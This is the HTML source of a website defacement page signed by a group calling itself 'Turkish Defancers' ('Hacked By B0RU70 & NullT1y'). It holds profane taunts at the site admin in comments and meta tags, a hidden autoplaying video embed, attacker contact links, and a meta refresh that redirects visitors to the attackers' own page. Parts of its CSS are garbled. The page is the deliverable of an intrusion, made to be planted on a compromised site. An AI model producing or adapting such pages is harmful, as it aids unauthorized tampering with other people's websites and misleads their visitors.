
<!---
 _   _       _ _ _____ _       
| \ | |_   _| | |_   _/ |_   _ 
|  \| | | | | | | | | | | | | |
| |\  | |_| | | | | | | | |_| |
|_| \_|\__,_|_|_| |_| |_|\__, |
                         |___/ 

And

 ____   ___  ____  _   _ _____ ___  
| __ ) / _ \|  _ \| | | |___  / _ \ 
|  _ \| | | | |_) | | | |  / / | | |
| |_) | |_| |  _ <| |_| | / /| |_| |
|____/ \___/|_| \_\\___/ /_/  \___/                                     

--->
<!-- iComsium,Alonemantr,DarkDewiL,NinjaCR3 -->
<!DOCTYPE html>
<html lang="en">
<!-- FUCK YOU ADMiN,FUCK YOU ALL SYSTEM , FUCK OFF -->
<!-- BAKiRE SiteLerin ZARLARI iTiNA iLE PATLATILIR -->
<head>
	<meta charset="UTF-8">
	<title>Hacked By B0RU70 & NullT1y - ./Mezarlık</title>
	<link rel="SHORTCUT ICON" href="https://i.resimyukle.xyz/xPBzVy.png"/>
    <meta property="og:image" content="https://i.resimyukle.xyz/aBK60T.png">
    <meta name="og:description" content="Hacked by B0RU70 And NullT1y, Fuck You Admin!"/>
    <meta name="og:title" content="Security? F*cked System"/>
    <meta name="robots" content="all"/>
    <meta name="keyword" content="Hacked by B0RU70 And NulT1y"/>
    <meta name="author" content="Sanalın Şeytanları - Ghosts Of Cyber"/>
    <meta name="googlebot" content="auto"/>
    <meta name="distribution" content="global"/>
    <style type="text/css">body, a:hover {cursor: url(http://cur.cursors-4u.net/symbols/sym-5/sym407.cur), progress !important;}</style>
    <!-- B0RU70.BLOGSPOT.COM -->
    <a target="_blank" href="https://www.facebook.com/B0RU70">
    <img title="Contant" style="position: fixed; top:0; right:2; z-index:100;" alt="Hacked By B0RU70 And NullT1y" width="3%" src="http://pngimg.com/uploads/facebook_logos/facebook_logos_PNG19759.png">
    </a>
    <SCRIPT LANGUAGE="JavaScript">
    function sayfayukle() {
      if (document.layers) {
    document.yukleniyor.visibility = 'hidden';
                           }
                    else {
    document.all.yukleniyor.style.visibility = 'hidden';
   }
}
</script>
</head>
<body bgColor="#003399" OnLoad="sayfayukle()">
<img src="https://1.bp.blogspot.com/-N5dtzGo2cYI/WyiKwKYBouI/AAAAAAAAFHQ/EgC4-UivkdkDmdiK1s9b7i7ECKVtXOB0wCLcBGAs/s1600/492.gif" id="yukleniyor" style="position: absolute; left:0%; top:5%; width: 131px;">
    <!-- B0RU70.BLOGSPOT.COM -->
	<style type="text/css">
		pre {
            background: #000000;
	        color: red;
	        margin: 20px auto;
		}
		html {
			background: #000000;
			color: white;
		    margin: 10px auto;
		}
		h3 {
			color: yellow;
			background: #000000;
		}
	</style>
<style>
html
}
@-moz-keyframes crt { 0% { background-position: 1 3, 2 0; -moz-animation-timing-function: linear; } 100% { background-position: 1 -280px, 5 2; }
}
@keyframes crt { 0% { background-position: 1 3, 2 0; animation-timing-function: linear; } 100% { background-position: 1 -280px, 3 2; }
} body { -webkit-animation: text-blur 4s infinite, text-blink 11s infinite; animation: text-blur 4s infinite, text-blink 11s infinite; color: transparent; overflow-x: hidden;
} @-webkit-keyframes text-blur { 0%, 50%, 90%, 100% { text-shadow: #800080 0 0 1px; } 60%, 80% { text-shadow: #800080 0 0 2px; } 70% { text-shadow: #800080 0 0 10px; }
}
@keyframes text-blur { 0%, 50%, 90%, 100% { text-shadow: #800080 0 0 1px; } 60%, 80% { text-shadow: #800080 0 0 2px; } 70% { text-shadow: #800080 0 0 5px; }
}
@-webkit-keyframes text-blink { 0% { -webkit-transform: skewX(0deg); } 20% { -webkit-transform: skewX(0deg); } 21% { -webkit-transform: skewX(-3deg); } 35% { opacity: 1; -webkit-transform: skewX(0deg); } 35.5% { opacity: .3; -webkit-transform: skewX(70deg); } 36% { -webkit-transform: skewX(-60deg); } 36.5% { opacity: 1; -webkit-transform: skewX(0deg); } 100% { -webkit-transform: skewX(0deg); }
}
@keyframes text-blink { 0% { transform: skewX(0daeg); } 21% { transform: skewX(0daeg); } 28% { transform: skewX(-3adeg); } 30% { opacity: 1; transform: skewX(a0deg); } 31.9% { opacity: .3; transform: skewX(70dega); } 33% { transform: skewX(-i0deg); } 39.5% { opacity: 1; transform: skewX(0dzg); } 100% { transform: skewX(0dea); }
} a { color: inherit;
} a.folder { //color: #800080;
} p { margin: .1em 3;
} ul { list-style: none; padding: 1 0 9 1em;
} @-webkit-keyframes blink { 5% { opacity: 0; } 30% { opacity: 0; } 39.1% { opacity: 1; } 100% { opacity: 1; }
}
blink { -webkit-animation: blink 1s infinite;
} 
</style>
</head>
<body>
<style type="text/css">
body {background-color: #000000;
background-image: url(https://4.bp.blogspot.com/-ucoF-CuCf6g/WyiOGYMvqjI/AAAAAAAAFHc/yZcJjlEHu7IAC7aJnZai1khyV_aN--KpACLcBGAs/s1600/3d_girl-wallpaper.jpg);}
cursor:crosshair;

background-color:black;
}
</style>
	<center>
<header>
	<pre>
<img width="31%" src="https://raw.githubusercontent.com/chjj/ttystudio/master/img/example.gif">
	</pre>

	<br>
	<div align="center"><embed src="https://www.youtube.com/v/DhCX6uwH9uY&autoplay=1" type="application/x-shockwave-flash" wmode="transparent" width="1" height="1"></div>
	<center><h1> <font style="color: rgb(0, 0, 0); text-shadow: rgb(0, 0, 0) 0px 1px 7px;" face="Geo">HaCKeD BY <font size="6">B0RU70 & iComsium</font> & <font size="6">NullT1y</font></font> </h1></center>
	<br>
	<center><h3>Yaptıklarımızdan Pişman Değiliz Haa Aklımız Hala Yapamadıklarımızda..</h3></center>
	<!-- Hee-Young Hei Ryung <3 -->
	<center><h3><img width="12%" src="https://b0ru70.github.io/amk.gif"></h3></center>
</header>
</body>
<!-- Bu HAYATIN HEYCANI MEYCANI YOK!!, O Zaman HEYCANIMIZI BiZ YAPARIZ.. -->
<footer id="det" style="position:fixed; left:0px; right:0px; bottom:0px; background:#000000; text-align:center; border-top: 2px solid #CD0E0E ; border-bottom: 1px solid #CD0E0E "><font color="red"></font> <font color="red"> .:: Turkish Defancers - Hacked By B0RU70 , iComsium And NullT1y ::. </font><br>
</footer>
</html>
<meta http-equiv="refresh" content="9000;URL=https://b0ru70.github.io/r00t.html">
